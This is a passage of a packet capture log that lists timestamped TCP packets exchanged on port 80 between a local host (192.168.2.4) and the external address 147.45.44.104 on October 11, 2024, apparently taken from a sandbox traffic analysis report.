                                                                                                                                                      Oct 11, 2024 23:07:01.904977083 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.905694008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905745029 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905760050 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905787945 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.905822039 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905836105 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905849934 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905868053 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.905883074 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.905893087 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.906642914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906687021 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.906719923 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906734943 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906759024 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906773090 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906776905 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.906789064 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.906816006 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.960581064 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.992810011 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.992856979 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.992912054 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.992913008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.992950916 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.992984056 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993000031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993016958 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993051052 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993067026 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993083000 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993118048 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993128061 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993153095 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993190050 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993199110 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993222952 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993272066 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993273973 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993305922 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993338108 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993352890 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993371010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993418932 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993457079 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993489027 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993519068 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993535042 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.993554115 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.993602037 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.994088888 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994139910 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994173050 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994191885 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.994247913 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994280100 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994297028 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.994313002 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994348049 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994359970 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.994381905 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994412899 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994430065 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.994466066 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994482040 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.994512081 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995014906 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995039940 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995054007 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995069981 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995100975 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995155096 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995170116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995183945 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995198011 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995214939 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995244026 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995276928 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995290995 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995305061 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995318890 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.995332956 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.995366096 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996237993 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996252060 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996268034 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996299982 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996325970 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996340990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996355057 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996371031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996385098 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996400118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996407032 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996413946 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996428013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996442080 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996442080 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996469975 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:01.996864080 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:01.996913910 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.079677105 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079720020 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079757929 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079773903 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079788923 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079798937 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.079802990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079818964 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.079824924 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.079858065 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.080137968 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.080194950 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.083875895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.083906889 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.083939075 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.083960056 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084059000 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084091902 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084114075 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084141970 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084173918 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084187031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084224939 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084256887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084273100 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084306955 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084352970 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084357977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084391117 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084422112 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084435940 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084477901 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084510088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084525108 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084541082 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084572077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084587097 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084606886 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084656000 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084774017 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084805965 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084855080 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084857941 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084891081 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084935904 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.084944010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.084992886 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085035086 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085055113 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085067034 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085098982 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085112095 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085129976 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085163116 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085175037 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085376978 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085424900 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085448980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085498095 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085530996 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085546970 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085562944 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085593939 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085608006 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085627079 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085675001 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085683107 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085705042 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085736990 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085752964 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085768938 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085800886 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085819960 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085832119 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085864067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085876942 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.085895061 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085928917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.085939884 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086313009 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086363077 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086364031 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086396933 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086443901 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086451054 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086474895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086527109 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086529016 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086577892 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086611032 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086622000 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086642981 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086673975 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086688995 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086705923 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086736917 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086750031 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086769104 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086801052 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086812973 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.086833000 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086865902 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.086878061 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087357044 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087416887 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087418079 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087467909 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087513924 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087517977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087737083 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087768078 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087786913 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087800980 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087832928 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087846041 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087865114 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087897062 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087909937 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087929010 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087963104 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.087974072 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.087996006 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088027954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088041067 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088059902 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088093996 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088104963 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088248968 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088284016 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088310003 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088334084 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088365078 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088382959 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088413954 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088445902 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088463068 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088495016 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088526964 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088542938 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088557959 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088588953 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088599920 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088620901 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088653088 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088670969 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088685036 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088716030 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088733912 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.088746071 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088781118 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.088814020 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.089241982 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.089292049 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.089298010 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.089327097 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.089359045 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.089379072 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.089397907 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.089453936 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.173753977 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.173842907 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.173899889 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.174057961 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.174797058 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.174834013 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.174906969 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175045013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175092936 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.175137997 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175373077 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175410032 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.175431013 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175447941 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175462008 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175482988 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.175594091 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175607920 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175622940 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175628901 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.175646067 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175658941 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.175659895 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175673962 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.175695896 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.226172924 CEST4973080192.168.2.4147.45.44.104
                                                                                                                                                      Oct 11, 2024 23:07:02.263207912 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263243914 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263259888 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263274908 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263298988 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263313055 CEST8049730147.45.44.104192.168.2.4
                                                                                                                                                      Oct 11, 2024 23:07:02.263326883 CEST8049730147.45.44.104192.168.2.4
